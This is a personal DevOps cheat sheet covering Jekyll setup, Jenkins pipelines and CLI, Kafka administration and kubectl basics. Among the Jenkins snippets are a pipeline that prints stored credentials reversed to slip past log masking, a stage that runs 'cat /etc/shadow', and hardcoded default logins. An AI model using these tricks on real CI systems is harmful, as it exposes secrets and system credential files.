npm install --save-dev javascript-obfuscator

javascript-obfuscator input_file_name.js [options]
javascript-obfuscator input_file_name.js --output output_file_name.js [options]

translate yaml/markdown/liquid to html pages Transform your plain text into static websites and blogs.

Other static sites generators, blogging tool

Jekyll Templates

Template language Liquid

Templates for dynamic web page creation

How to start with Jekyll

git clone https://github.com/sharu725/online-cv.git
cd online-cv
# Start Jekyll like: docker run ...
x-www-browser localhost:9090

Start Jekyll

Manual installation

sudo apt install bundler jekyll
bundle add webrick

### check versions 
ruby --version
# ruby 3.1.1p18
gem --version
# 3.3.25
DOCKER_IMG_NAME=jekyll/jekyll
DOCKER_IMG_TAG=3.8
# DOCKER_IMG_TAG=3.9.3
# DOCKER_IMG_TAG=latest
DOCKER_JEKYLL=jekyll

# start server with caching gem's
docker run --rm --name $DOCKER_JEKYLL --volume="$PWD:/srv/jekyll:Z" --volume="$PWD/vendor/bundle:/usr/local/bundle:Z" --publish [::1]:4000:4000 $DOCKER_IMG_NAME:$DOCKER_IMG_TAG jekyll serve --force_polling
# connect to running container 
# docker exec -it `docker ps | grep jekyll/jekyll | awk '{print $1}'` /bin/sh
x-www-browser http://localhost:4000


wkhtmltopdf 

docker-compose start

version: "2"
services:
  jekyll:
      image: jekyll/jekyll:3.9.3
      command: jekyll serve --force_polling
      ports:
          - 4000:4000
      volumes:
          - .:/srv/jekyll
          - ./vendor/bundle:/usr/local/bundle
      environment:
        JEKYLL_UID: 1001
        JEKYLL_GID: 1001

jekyll commands

# create new source folder
jekyll new my-cv

# build web pages
jekyll build

# bundle exec jekyll serve
jekyll serve
jekyll serve --force_polling --livereload
x-www-browser localhost:4000

possible issues

  • `require': cannot load such file -- webrick

    # gem install webrick # didn't work
    bundle add webrick
    bundle exec jekyll serve
  • ‘ruby3.0’: No such file or directory

    ❯ jekyll build
    /usr/bin/env: ‘ruby3.0’: No such file or directory
    ll /usr/bin/ruby3.0
    ln -s /usr/bin/ruby3.2 /usr/bin/ruby3.0

Jenkins cheat sheet

Deployment strategies:

  • Delivery ( need approve from the "human" )
  • Deployment ( Continuous ) = Delivery (auto approve) + Automation + Event (time,commits,tag...)

links

alternatives

alternatives in cloud ( SaaS )

DSL

installation on debian

installation master-slave

master-slave
master-slave master-slave creation process for OCP
master-slave-ocp-creation

manual clean up

rm -rf .jenkins/caches/* rm -rf .jenkins/workspace/*

manual start manual installation

jenkins manual how to
jenkins war
jenkins war download
jenkins docker image
jenkins docker documentation

java -jar jenkins.war --httpPort=8080 --useJmx 
~/.jenkins/secrets/

how to know version

(/var/lib/jenkins) (/opt/webconf/var/lib/jenkins) config.xml 1.599

restart jenkins

  • {jenkins-url}/safeRestart
  • {jenkins-url}/restart
  • java -jar /var/cache/jenkins/war/WEB-INF/jenkins-cli.jar -s {jenkins-url} safe-restart

stop jenkins

{jenkins-url}/exit

connect to jenkins

JENKINS_HOST=jenkins-stg.vantage.com
JENKINS_USER=cherkavi

JENKINS_URL=https://$JENKINS_HOST
# curl -Lv $JENKINS_URL/login 2>&1  | grep -i 'cli-port'
# wget $JENKINS_URL/jnlpJars/jenkins-cli.jar
java -jar jenkins-cli.jar -noCertificateCheck -s $JENKINS_URL help

java -jar jenkins-cli.jar -s $JENKINS_URL -webSocket -auth $JENKINS_USER:$JENKINS_API_TOKEN help
java -jar jenkins-cli.jar -s $JENKINS_URL -noCertificateCheck -auth $JENKINS_USER:$JENKINS_API_TOKEN help

connect via ssh

curl -Lv $JENKINS_URL/login 2>&1  | grep -i 'x-ssh-endpoint'
# security settings: add public ssh 
# $JENKINS_URL/user/$JENKINS_USER/configure -> SSH Public Keys

# x-jenkins-cli-port: 50000
ssh -l $JENKINS_USER -p 50000 $JENKINS_HOST help

java -jar jenkins-cli.jar -s $JENKINS_URL -ssh -user $JENKINS_USER -i ~/.ssh/id_rsa -logger FINE

connect via ssh

# security settings: add public ssh 
# $JENKINS_URL/user/$JENKINS_USER/configure -> SSH Public Keys

curl -Lv $JENKINS_URL/login 2>&1  | grep -i 'x-ssh-endpoint'
ssh -l $JENKINS_USER -p 50000 $JENKINS_HOST help

collaboration between steps, passing data between steps

  1. Set your variable export myenv=value1 and read in afterwards
  2. print to file echo $START > env_start.txt and read it afterwards START=$(cat env_start.txt)

Script Console ( Manage Jenkins )

Thread.getAllStackTraces().keySet().each() {
  t -> if (t.getName()=="YOUR THREAD NAME" ) {   t.interrupt();  }
}
Jenkins.instance.getItemByFullName("Brand Server/develop").getBuildByNumber(614).finish(hudson.model.Result.ABORTED, new java.io.IOException("Aborting build"));
Jenkins.instance.getItemByFullName("Brand Server/develop").getBuildByNumber(614).doKill();

jenkins simple pipeline

node {
 	stage("Step #1") {
		echo "first bite"
	}

	stage("Step #2") {
		sh "ansible --version"
	}
}
def saveToFileUrl(gitRepoUser, gitRepoName, gitFilePath, localFileName){
    final String gitUrl="https://github.net"
    String gitFileDescription = ""
    withCredentials([usernamePassword(credentialsId: 'xxxxx', passwordVariable: 'gitToken', usernameVariable: 'gitUser')]) {
        gitFileDescription = sh(script: "curl -u ${gitUser}:${gitToken} ${gitUrl}/api/v3/repos/${gitRepoUser}/${gitRepoName}/contents/${gitFilePath} | grep download_url", returnStdout: true).trim()
    }   
    
    final String urlResponse = sh(script: "curl -s ${gitFileDescription.split(" ")[1].replaceAll('"','').replaceAll(',','')}", returnStdout: true).trim()
    writeFile file: localFileName, text: urlResponse
    return urlResponse    
}

pipeline {
    agent any

    stages {
        stage('download execution script') {
            steps{
                script{
                    env.TMP_FILE_NAME = createTempFile();
                    saveToFileUrl(getGitRepoUser(), getGitRepoName(), getGitPath(), "${env.TMP_FILE_NAME}")                
                }
            }
        }        
        stage('execute script REST API test') {
            steps{
                script{
                    withCredentials([usernamePassword(credentialsId: 'yyyyy', passwordVariable: 'pass', usernameVariable: 'user')]) {
                        env.D_USER=user
                        env.D_PASS=pass
                        def exitStatus=sh(script: "sh ${env.TMP_FILE_NAME}", returnStatus: true)
                        evaluateResult(exitStatus)
                    }   
                }
            }
        }
    }
}

with credential alternative

artifactoryCredential = string(credentialsId: '4d18-aaabb-4cdffaf348', variable: 'ARTIFACTORY_TOKEN')
withCredentials([artifactoryCredential]){
  sh "echo $ARTIFACTORY_TOKEN"
}

name of the build and using parameters

pipeline {
    agent any

    stages {
        stage('check input boolean parameter') {
            when {
                expression { params.FAIL }
            }
            steps {
                sh 'cat /etc/shadow'
            }
        }
    }
    post{
        success {
            script {
            currentBuild.displayName = "$BUILD_NUMBER - Successfull Build"
            currentBuild.description = "OK"
	    currentBuild.result='SUCCESS'
            }
        }
        failure {
            script {
            currentBuild.displayName = "$BUILD_NUMBER - Failed Build"
            currentBuild.description = "NOT OK"
	    currentBuild.result='FAILURE'
            }
        }
    }
}

use "system groovy script" for updating description with multisteps

echo "my description" > job_description.txt
def currentBuild = Thread.currentThread().executable
def workspace = build.workspace
def description = new File("${workspace}/job_describtion.txt").text
currentBuild.setDescription(description)

jenkins read http write file from http to scp

stage("Step #3") {
		final String url="https://api.ipify.org"
		final String urlResponse = sh(script: "curl -s $url", returnStdout: true).trim()
		final String outputFile = "/var/jenkins_home/my-ip-address.txt"
		writeFile file: outputFile, text: urlResponse

	withCredentials([usernamePassword(credentialsId: '222-333-444', passwordVariable: 'MY_SSH_PASS', usernameVariable: 'MY_SSH_USER')]) {
		final String host="localhost"
		final String outputFileName="my-host-ip"
		
		// final String command="sshpass -p " +MY_SSH_PASS+ " scp " +outputFile+ " " +MY_SSH_USER+ "@" +host+ ":~/" +outputFileName
		// final String command="sshpass -p $MY_SSH_PASS scp $outputFile $MY_SSH_USER@$host:~/$outputFileName"
		final String command="sshpass -p ${MY_SSH_PASS} scp ${outputFile} ${MY_SSH_USER}@${host}:~/${outputFileName}"
		sh(command)
		sh("rm $outputFile")
		}
      }```

### jenkins git timeout
```groovy
checkout([$class: 'GitSCM', branches: [[name: "*/$branch"]], doGenerateSubmoduleConfigurations: false, extensions: [[$class: 'GitLFSPull', timeout: 30], [$class: 'CloneOption', depth: 0, timeout: 30], [$class: 'CheckoutOption', timeout: 30]], submoduleCfg: [], userRemoteConfigs: [[credentialsId: 'a0e5424f-2ffb-', url: '$CC_GIT_CREDENTIAL']]])
    }

jenkins job DSL user input, build with parameters


	if (isGitBranch('OPM-integration-test')) {
            stage('candidate-git-label') {
                lastCommit = sh(returnStdout: true, script: "git log -n 1 --pretty=format:'%h'").trim()
                print(lastCommit)
                def newVersion = readVersion()
                print("this is new version: $newVersion")
            }
            stage('candidate-deploy') {
                mvn('org.apache.tomcat.maven:tomcat7-maven-plugin:2.2:redeploy -Dmaven.tomcat.url=http://host:9090/manager/text -Dtomcat.username=root -Dtomcat.password=root -DskipTests ')
            }
		}

--------------
def readVersion() {
  try {
    timeout(time: 20, unit: 'MINUTES') {
        def keep = input message: 'New version of application:',
                    parameters: [stringParam(defaultValue: "2018.06.00.00-SNAPSHOT", description: 'new application version', name: 'currentBuildVersion')]
        return keep
    }
  } catch(e) {
    return "2018.06.00.00-SNAPSHOT"
  }
}

jenkins job DSL frame for env.BRANCH_NAME<->build step

	needToExecuteStage('build', {
            mvn('-U clean package -Dmaven.javadoc.skip=true')
	})

        needToExecuteStage('deploy nexus', {
            mvn('-U deploy -Dmaven.javadoc.skip=true -Dbuild.number=${GIT_BRANCH}-#${BUILD_NUMBER}')
	})

        needToExecuteStage('sonar', {
            mvn('sonar:sonar -Psonar-test')
	})

        needToExecuteStage('integration tests', {
            mvn('install -DskipTests -DskipITs=false -Pintegration-tests,dev -Dheadless=1')
        })

        needToExecuteStage('git label', {
            def newVersion = readVersion()
            print(">-> deploy application with new version: $newVersion")
            sh( script: "git checkout $BRANCH_NAME ")
            def remoteUrl = sh(returnStdout: true, script: "git config --get remote.origin.url ")
            sh( script: "git remote set-url origin $remoteUrl ")
            sh(script: "echo $newVersion > opm-gui/src/main/webapp/META-INF/commit ")
            sh(script: "git rev-parse HEAD >> opm-gui/src/main/webapp/META-INF/commit ")
            sh( script: "git tag -a $newVersion -m 'deployment_jenkins_job' ")
            sshagent (credentials: ['git_jenkins']) {
                 sh("git push --tags $remoteUrl")
            }
            mvn ("versions:set -DnewVersion=$newVersion")
            mvn ("-N versions:update-child-modules")
            mvn ("clean install -DskipTests=true")
		})

        needToExecuteStage('deploy tomcat', {
            mvn('org.apache.tomcat.maven:tomcat7-maven-plugin:2.2:redeploy -Dmaven.tomcat.url=http://v337:9090/manager/text -Dtomcat.username=root -Dtomcat.password=root -DskipTests ')
        })

// -------------------------------------------
def executeStage(needToExecute, stageName, func){
    if(needToExecute){
        stage(stageName){
            func()
        }
    }
}

def needToExecuteStage(stageName, func){
    def decisionTable = [
             'release' : ["build": true,  "deploy nexus": true,  "sonar": false, "integration tests": true,  "git label": true,  "deploy tomcat": false]
            ,'develop' : ["build": true,  "deploy nexus": true,  "sonar": true,  "integration tests": true,  "git label": false, "deploy tomcat": true ]
            ,'feature' : ["build": true,  "deploy nexus": false, "sonar": false, "integration tests": true,  "git label": false, "deploy tomcat": false]
            ,'master'  : ["build": true,  "deploy nexus": true,  "sonar": false, "integration tests": true,  "git label": false, "deploy tomcat": false]
,'integration-test': ["build": true,  "deploy nexus": true,  "sonar": false, "integration tests": true,  "git label": false, "deploy tomcat": false]
    ]

    def branchName = env.BRANCH_NAME
    if(decisionTable[branchName]!=null){
        executeStage(decisionTable[branchName][stageName], stageName, func)
        return
    }

    for ( def key in decisionTable.keySet()){
        if(branchName.startsWith(key)){
            executeStage(decisionTable[key][stageName], stageName, func)
            return
        }
    }
}

groovy escape quotes

String input = "this ain't easy"
String escaped = "'" + input.replaceAll(/'/, /'"'"'/) + "'"
println escaped
// 'this ain'"'"'t easy'
sh "mycommand --input ${escaped}"

groovy random groovy variables

// vairable inside jenkins pipeline

pipeline {
    agent any

    environment {
        TMP_FILE_NAME = "kom.yaml"+"${Math.abs(new Random().nextInt(99999))}"
    }

    stages {
        stage('read from git write to cluster') {
            steps {
                echo "----- ${env.TMP_FILE_NAME}"                    

                script {
                    env.TMP_FILE_NAME2 = "second variable"
                }
                echo "----- ${env.TMP_FILE_NAME2}"                    

            }
        }
    }

}

groovy pipeline show credentials

// create pipeline with groovy script

/**
Jenkins Pipeline (create project Pipeline) script for printing out credentials 
# jenkins show credentials 
*/
def show(){
    withCredentials([sshUserPrivateKey(credentialsId: 'xxx-yyy-883a-38881320d606', keyFileVariable: 'data_api_key', passphraseVariable: '', usernameVariable: 'data_api_username')]) {
        return "\n>>>  data_api_key ${data_api_key} \n data_api_username: ${data_api_username}"
    }
    withCredentials([usernamePassword(credentialsId: 'xxx-yyy-a659-b54d73eec29a', passwordVariable: 'database_password', usernameVariable: 'database_user')]) {
        return " \nlogin ${database_user} \npassword ${database_password}"
    }
}

pipeline {
    agent any

    stages {
        stage('show me') {
            steps {
                echo "-----"
                echo show().reverse()
                echo "-----"
            }
        }
    }
}

// # echo "gts-pd-sergtsop" | rev

pipeline with bash script and specific agent

pipeline {
    agent { label 'agent-maven-python-git-ansible' }

    stages {
        stage('print message ') {
            steps {
                echo 'Hello World'
            }
        }
        stage('print ansible version'){
            steps {
                sh 'ansible-playbook --version'
            }
        }
    }
}

condition for step

...
  stage('Action') {
        if (env.CUSTOM_VARIABLE ==~ /(?i)(Y|YES|T|TRUE|ON|RUN)/) {
	 ...

show accessible environment jenkins variables

$JENKINS_URL/env-vars.html/

REST API

check connection

JENKINS_URL=https://jenkins-stg.dpl.org
curl -sg "$JENKINS_URL/api/json?tree=jobs[name,url]" --user $DXC_USER:$DXC_PASS

deploy with parameters

# obtain list of parameters: $JENKINS_URL/job/application/job/data-api/job/deployment/job/deploy-services/api/json?pretty=true
curl $JENKINS_URL/job/application/job/data-api/job/deployment/job/deploy-services/buildWithParameters \
  --user $DXC_USER:$DXC_PASS \
  --data BRANCH_NAME=master \
  --data DESTINATION=stg-6 \
  --data DEBUG=true  \
  --data DEPLOY_DATA_APIDEBUG=true  

job information

curl -sg "$JENKINS_URL/job/application/job/data-portal/job/deployment/job/deploy-from-branch-3/244/api/json" --user $DXC_USER:$DXC_PASS
curl -sg "$JENKINS_URL/job/application/job/data-portal/job/deployment/job/deploy-from-branch-3/244/api/json?tree" --user $DXC_USER:$DXC_PASS
curl -sg "$JENKINS_URL/job/application/job/data-portal/job/deployment/job/deploy-from-branch-3/api/json?tree=allBuilds[number,url]" --user $DXC_USER:$DXC_PASS

job full log output

curl -sg "$JENKINS_URL/job/application/job/data-portal/job/deployment/job/deploy-from-branch-3/244/consoleFull" --user $DXC_USER:$DXC_PASS

sonar management

obtaining

wget https://sonarsource.bintray.com/Distribution/sonarqube/

start/stop/status

/dev/sonar/bin/linux-x86-64/sonar.sh start
/dev/sonar/bin/linux-x86-64/sonar.sh status
/dev/sonar/bin/linux-x86-64/sonar.sh stop

sonar

url: http://host01:9000
login: admin
passw: admin

print all accessible variables

echo sh(returnStdout: true, script: 'env')

plugins

plugin manual installation

copy jpi/hpi file into {JENKINS_HOME/plugins}

plugin manual removing

copy jpi/hpi file into {JENKINS_HOME/plugins}

list all accessible plugins

https://{jenkins-url}/pluginManager/api/xml?depth=1
emailext body: mailNotification.toString(), subject: "notification", to: env.mail_recipients, mimeType: "text/plain"

email for bash script

if [[ -n $status_error ]]; then
    echo "need to be considered"
    exit 1
fi

Post-build Actions -> E-Mail Notification -> Send e-mail for every unstable build

Issues

ERROR: script not yet approved for use

http://localhost:9090/scriptApproval/

withMaven(jdk: 'jdk8', maven: 'mvn-325', mavenSettingsConfig: 'paps-maven-settings') {

jdk with name "jdk8" should be configured: http://localhost:9090/configureTools/
maven with name "mvn-325" should be configured: http://localhost:9090/configureTools/

Could not find the Maven settings.xml config file id:paps-maven-settings. Make sure it exists on Managed Files

plugin should be present
http://localhost:9090/configfiles/

RSA key fingerprint is SHA256:xxxxxx Are you sure you want to continue connecting (yes/no) ? ssh://[email protected]:7999/pportal/commons.git

change 
gitHostUrl = "https://[email protected]/scm"

Workspace sharing between runs

execute shell

echo "---------------"
ls -la current-date.txt || echo "."
cat current-date.txt || echo "."
readlink -f current-date.txt
pwd
date > current-date.txt
ls -la current-date.txt
echo "---------------"

output

[EnvInject] - Loading node environment variables.
Building on master in workspace /var/lib/jenkins/jobs/application/jobs/data-api/jobs/test/jobs/test-project/workspace
[workspace] $ /bin/sh -xe /tmp/jenkins908209539931105022.sh
+ echo ---------------
---------------
+ ls -la current-date.txt
-rw-r--r--. 1 1001 root 29 Feb  8 10:08 current-date.txt
+ cat current-date.txt
Tue Feb  8 10:08:39 UTC 2022
+ readlink -f current-date.txt
/var/lib/jenkins/jobs/application/jobs/data-api/jobs/test/jobs/test-project/workspace/current-date.txt
+ pwd
/var/lib/jenkins/jobs/application/jobs/data-api/jobs/test/jobs/test-project/workspace
+ date
+ ls -la current-date.txt
-rw-r--r--. 1 1001 root 29 Feb  8 10:13 current-date.txt
+ echo ---------------
---------------
Finished: SUCCESS

Kafka cheat sheet

position in architecture

graph

m[messaging]

pc[producer  -- one --> consumer]
ps[publisher -- many --> subscriber]

pc --extends-->m
ps --extends-->m

Loading

Kafka guarantees

  • messages that sent into particular topic will be appended in the same order
  • consumer see messages in order that were written
  • "At-least-once" message delivery guaranteed - for consumer who crushed before it commited offset
  • "At-most-once" delivery - ( custom realization ) consumer will never read the same message again, even when crushed before process it

Best practice

  • it is better to have many small messages instead of big one
  • Integration tests should have real-world messages
git clone https://github.com/apache/kafka.git kafka

or kafka download

main concepts

  • Topics category of messages, consists from Partitions
  • Partition ( Leader and Followers ) part of the Topic, can be replicated (replication factor) across Brokers, must have at least one Leader and 0..* Followers when you save message, it will be saved into one of the partitions depends on: partition number | hash of the key | round robin
    partition size calculator
    partitions
  • Leader main partition in certain period of time, contains InSyncReplica's - list of Followers that are alive in current time
  • Committed Messages when all InSyncReplicas wrote message, Consumer can read it after, Producer can wait for it or not
  • Brokers one of the server of Kafka ( one of the server of cluster )
  • Producers some process that publish message into specific topic
  • Consumers topics subscriber
  • Consumer Group group of consumers, have one Load Balancer for one group, consumer instance from different group will receive own copy of message ( one message per group )

concepts
workflow
consumer
consumer
consumer group
producer
partitions
recommendations

Error Handling

consumer messages processing

code examples

At most once

offset controlled by timer

enable.auto.commit=true;     # Kafka would auto commit offset at the specified interval.
# !!! do not make call to consumer.commitSync(); from the consumer. With this configuration of consumer, 
auto.commit.interval.ms=1;   # set it to lower timeframe

At-least-once

offset controlled by broker scenario happens when consumer processes a message and commits the message into its persistent store and consumer crashes at that point, haven't commit to kafka broker Duplicate message delivery could happen in the following scenario. quarkus.kafka-streams.processing-guarantee=at_least_once

enable.auto.commit=false  #  enable.auto.commit=true and auto.commit.interval.ms=999999999999999
# consumer.commitSync(); # After reading. Consumer should now then take control of the message offset commits
sequenceDiagram

broker ->> consumer:  read message A315

consumer ->> processing:  process message
processing -->> consumer: done

consumer --> consumer: commitSync 

destroy consumer
processing -x consumer: die

broker ->> broker: no response
Loading
sequenceDiagram

broker ->> consumer:  read message A315 ( duplication )

consumer ->> processing:  process message A315
processing -->> consumer: done

consumer -->> consumer: commitSync

consumer -->> broker: commit offset

broker ->> consumer:  read message A316
consumer ->> processing:  process message A316

Loading

Exactly once

offset controlled by consumer in external storage quarkus.kafka-streams.processing-guarantee=exactly_once # exactly_once_v2

enable.auto.commit=false
# !!! do not make call to consumer.commitSync(); 
# use new KafkaConsumer<String, String>(props).subscribe("topic", ConsumerRebalancerListener)

flowchart RL
c --o cs[Consumer]
of[OffsetManager] --o c[ConsumerRebalancerListener]
of <-.->|rw| es[offset 
                ExternalStorage ]

SQL   -->|extends| es
NoSQL -->|extends| es
Kafka[Kafka 
     exactly_once_v2] -->|extends| es
Loading

ZoopKeeper ( one instance per cluster )

  • must be started before using Kafka ( zookeeper-server-start.sh, kafka-server-start.sh )
  • cluster membership
  • electing a controller
  • topic configuration leader, which topic exists
  • Quotas
  • ACLs
    ./kafka-acls.sh

scripts

start Kafka's Broker

zookeeper-server-start.sh
kafka-server-start.sh config/server.properties

ksql

flowchart LR

ksql --> ks["kafka \n stream"]
ks --> cp[consumer\nproducer]
Loading
@startuml

[ksql] as ksql 
rectangle "kafka stream jar" as stream #lightgreen
[app]  as app 

[consumer \n producer] as consumer
[kafka] as kafkap

ksql -right--> stream : use
app o-- stream  : aggregate

stream -right--> consumer
consumer -up-> kafka

@enduml

ksql ( MapR )

create stream

# create stream
maprcli stream create -path sample-stream -produceperm p -consumeperm p -topicperm p

# generate dummy data 
/opt/mapr/ksql/ksql-4.1.1/bin/ksql-datagen quickstart=pageviews format=delimited topic=sample-stream:pageviews  maxInterval=5000

create table for stream

/opt/mapr/ksql/ksql-4.1.1/bin/ksql http://ubs000130.vantage.org:8084

ksqldb what is

it is storage of messages with ability to look into window ( time based ) using ConfluenceKafkaSQL

ksqldb pillars

  • stream processing
  • connectors
  • mater. views

ksqldb queries

  • pull query
  • push query
create table pageviews_original_table (viewtime bigint, userid varchar, pageid varchar) with (kafka_topic='sample-stream:pageviews', value_format='DELIMITED', key='viewtime')
select * from pageviews_original_table;

topic create

bin/kafka-topics.sh --create --zookeeper localhost:2181 --replication-factor 1 --partitions 1 --topic mytopic
bin/kafka-topics.sh --create --zookeeper localhost:2181 --replication-factor 1 --partitions 1 --describe --topic mytopic
bin/kafka-topics.sh --create --zookeeper localhost:2181 --replication-factor 1 --partitions 1 --config retention.ms=360000 --topic mytopic

or just enable "autocreation"

auto.create.topics.enable=true

topic delete

can be marked "for deletion"

bin/kafka-topics.sh --delete --zookeeper localhost:2181 --topic mytopic

topics list

bin/kafka-topics.sh --create --zookeeper localhost:2181 --list

topics describe

kafka-topics --describe --zookeeper localhost:2181 --topic mytopicname

topic update

bin/kafka-topics.sh --alter --zookeeper localhost:2181 --partitions 5 --topic mytopic
bin/kafka-topics.sh --alter --zookeeper localhost:2181 --topic mytopic --config retention.ms=72000
bin/kafka-topics.sh --alter --zookeeper localhost:2181 --topic mytopic --deleteConfig retention.ms=72000

producer console

bin/kafka-console-producer.sh --broker-list localhost:9092 --topic mytopic

PRODUCER_CONFIG=/path/to/config.properties
TOPIC_NAME=my-topic
BROKER=192.168.1.140:9988
bin/kafka-console-producer.sh --producer.config $PRODUCER_CONFIG \
--broker-list $BROKER --topic $TOPIC_NAME

java producer example

 Properties props = new Properties();
 props.put("bootstrap.servers", "localhost:4242");
 props.put("acks", "all");  // 0 - no wait; 1 - leader write into local log; all - leader write into local log and wait ACK from full set of InSyncReplications 
 props.put("client.id", "unique_client_id"); // nice to have
 props.put("retries", 0);           // can change ordering of the message in case of retriying
 props.put("batch.size", 16384);    // collect messages into batch
 props.put("linger.ms", 1);         // additional wait time before sending batch
 props.put("compression.type", ""); // type of compression: none, gzip, snappy, lz4
 props.put("buffer.memory", 33554432);
 props.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer");
 props.put("value.serializer", "org.apache.kafka.common.serialization.StringSerializer");
 Producer<String, String> producer = new KafkaProducer<>(props);
 producer.metrics(); // 
 for(int i = 0; i < 100; i++)
     producer.send(new ProducerRecord<String, String>("mytopic", Integer.toString(i), Integer.toString(i)));
     producer.flush(); // immediatelly send, even if 'linger.ms' is greater than 0
 producer.close();
 producer.partitionsFor("mytopic")

partition will be selected

Consumer

consumer console ( console consumer )

bin/kafka-console-consumer.sh --zookeeper localhost:2181 --topic mytopic --from-beginning
bin/kafka-console-consumer.sh --zookeeper localhost:2181 --topic mytopic --from-beginning --consumer.config my_own_config.properties

bin/kafka-console-consumer.sh --bootstrap-server mus07.mueq.adac.com:9092 --new-consumer --topic session-ingest-stage-1 --offset 20 --partition 0  --consumer.config kafka-log4j.properties
bin/kafka-console-consumer.sh --bootstrap-server mus07.mueq.adac.com:9092 --group my-consumer-2 --topic session-ingest-stage-1 --from-beginning  --consumer.config kafka-log4j.properties

# read information about partitions
java kafka.tools.GetOffsetShell --broker-list musnn071001:9092 --topic session-ingest-stage-1
# get number of messages in partitions, partitions messages count
bin/kafka-run-class.sh kafka.tools.GetOffsetShell --broker-list localhost:9092 --topic session-ingest-stage-1

consumer group console

bin/kafka-consumer-groups.sh --zoopkeeper localhost:2181 --describe --group mytopic-consumer-group

consumer offset

  • automatic commit offset (enable.auto.commit=true) with period (auto.commit.interval.ms=1000)
  • manual offset commit (enable.auto.commit=false)
  • property "auto.offset.reset=latest" start with consuming only newly appeared messages in the topic after connection/creation
 Properties props = new Properties();
 props.put("bootstrap.servers", "localhost:4242"); // list of host/port pairs to connect to cluster
 props.put("client.id", "unique_client_id");       // nice to have
 props.put("group.id", "unique_group_id");         // nice to have
 props.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer");
 props.put("value.serializer", "org.apache.kafka.common.serialization.StringSerializer");
 props.put("fetch.min.bytes", 0);              // if value 1 - will be fetched immediatelly
 props.put("enable.auto.commit", "true");      //
 // timeout of detecting failures of consumer, Kafka group coordinator will wait for heartbeat from consumer within this period of time
 props.put("session.timeout.ms", "1000"); 
 // expected time between heartbeats to the consumer coordinator,
 // is consumer session stays active, 
 // facilitate rebalancing when new consumers join/leave group,
 // must be set lower than *session.timeout.ms*
 props.put("heartbeat.interval.ms", "");

consumer java

NOT THREAD Safe !!!

KafkaConsumer<String, String> consumer = new KafkaConsumer<>(props);
ConsumerRecords<String, String> records = consumer.pool(100); // time in ms

consumer consume messages

  • by topic
consumer.subscribe(Arrays.asList("mytopic_1", "mytopic_2"));
  • by partition
TopicPartition partition0 = new TopicPartition("mytopic_1", 0);
TopicPartition partition1 = new TopicPartition("mytopic_1", 1);
consumer.assign(Arrays.asList(partition0, partition1));
  • seek to position
seek(partition0, 1024);
seekToBeginning(parition0, partition1);
seekToEnd(parition0, partition1);

Kafka Stream State Stores

:TODO: in-memory DB ( Rocks DB )

Kafka connect

  • manage copying data between Kafka and another system
  • connector either a source or a sink
  • connector can split "job" to "tasks" ( to copy subset of data )
  • partitioned streams for source/sink, each record into it: [key,value,offset]
  • standalone/distributed mode
  • Two ways of wokring with Stream:
    • KSQL (KSQLDB)
    • Flink

      engine for running queries on cluster

Kafka connect standalone

start connect

bin/connect-standalone.sh config/connect-standalone.properties config/connect-file-source.properties

connect settings

name=local-file-source
connector.class=org.apache.kafka.connect.file.FileStreamSourceConnector
tasks.max=1
file=my_test_file.txt
topic=topic_for_me

after execution you can check the topic

bin/kafka-console-consumer.sh --zookeeper localhost:2181 --topic topic_for_me --from-beginning

additional tools

kafka cli (producer & consumer)

installation

apt-get install kafkacat

docker run

docker run -it --network=host edenhill/kcat:1.7.1

commands

minimal command
BROKER_HOST=192.168.1.150
BROKER_PORT=3388
TOPIC=my-topic
kafkacat -C -b $BROKER_HOST:$BROKER_PORT -t $TOPIC
# -X security.protocol=sasl_ssl \
# -X sasl.mechanisms=PLAIN      \
# -X sasl.username=$SASL_USER   \
# -X sasl.password=$SASL_PASS   \
read all messages, read messages from the beginning
kafkacat -C -b $BROKER_HOST:$BROKER_PORT -t $TOPIC -o beginning

read last messages, read messages from the end

kafkacat -C -b $BROKER_HOST:$BROKER_PORT -t $TOPIC -o -5

Consume messages and stop

kafkacat -C -b $BROKER_HOST:$BROKER_PORT -t $TOPIC -c 5
# Print messages with a specific output
kafkacat -C -b $BROKER_HOST:$BROKER_PORT -t $TOPIC -c 5 -f 'Key: %k, message: %s \n'
# more complex output
kafkacat -C -b $BROKER_HOST:$BROKER_PORT -t $TOPIC -c 5 -f '\nKey (%K bytes): %k\t\nValue (%S bytes): %s\nTimestamp: %T\tPartition: %p\tOffset: %o\nHeaders: %h\n--\n' -e

read messages in the time range, read messages between two datetimes

date_start=`date +'%Y-%m-%d %H:%M:%S' --date="2 hour ago"`
date_end=`date +'%Y-%m-%d %H:%M:%S'`

kafkacat -C -b $BROKER_HOST:$BROKER_PORT -t $TOPIC -o s@$date_start -o e@$date_end

read key of the message

kafkacat -C -b $BROKER_HOST:$BROKER_PORT -t $TOPIC -K\t

read message with specific key

kafkacat -C -b $BROKER_HOST:$BROKER_PORT -t $TOPIC -o beginning -K\t | grep $MESSAGE_KEY
# shrink time of the scan from "beginning" to something more expected

write/produce message

kafkacat -C -b $BROKER_HOST:$BROKER_PORT -t $TOPIC -c 5 -P -l /path/to/file

Kubernetes cheat sheet

useful links

tutorials

local playgrounds

remote playground and examples

tools

kubectl installation

curl -LO https://storage.googleapis.com/kubernetes-release/release/v1.17.4/bin/linux/amd64/kubectl
curl -LO https://storage.googleapis.com/kubernetes-release/release/v1.18.0/bin/linux/amd64/kubectl
  • kubectl autocompletion
source <(kubectl completion bash)
# source <(kubectl completion zsh)

or

# source /usr/share/bash-completion/bash_completion
kubectl completion bash >/etc/bash_completion.d/kubectl
  • trace logging
rm -rf ~/.kube/cache
kubectl get pods -v=6
kubectl get pods -v=7
kubectl get pods -v=8
# with specific context file from ~/.kube, specific config
kubectl --kubeconfig=config-rancher  get pods -v=8
  • explain yaml schema
kubectl explain pods
kubectl explain pods --recursive
kubectl explain pods --recursive --api-version=autoscaling/v2beta1
  • python client
pip install kubernetes

architecture architecture architecture nodes with software kubernetes


workflow

deployment workflow

  1. The user deploys a new app by using the kubectl CLI. Kubectl sends the request to the API server.
  2. The API server receives the request and stores it in the data store (etcd). After the request is written to the data store, the API server is done with the request.
  3. Watchers detect the resource changes and send notifications to the Controller to act on those changes.
  4. The Controller detects the new app and creates new pods to match the desired number of instances. Any changes to the stored model will be used to create or delete pods.
  5. The Scheduler assigns new pods to a node based on specific criteria. The Scheduler decides on whether to run pods on specific nodes in the cluster. The Scheduler modifies the model with the node information.
  6. A Kubelet on a node detects a pod with an assignment to itself and deploys the requested containers through the container runtime, for example, Docker. Each node watches the storage to see what pods it is assigned to run. The node takes necessary actions on the resources assigned to it such as to create or delete pods.
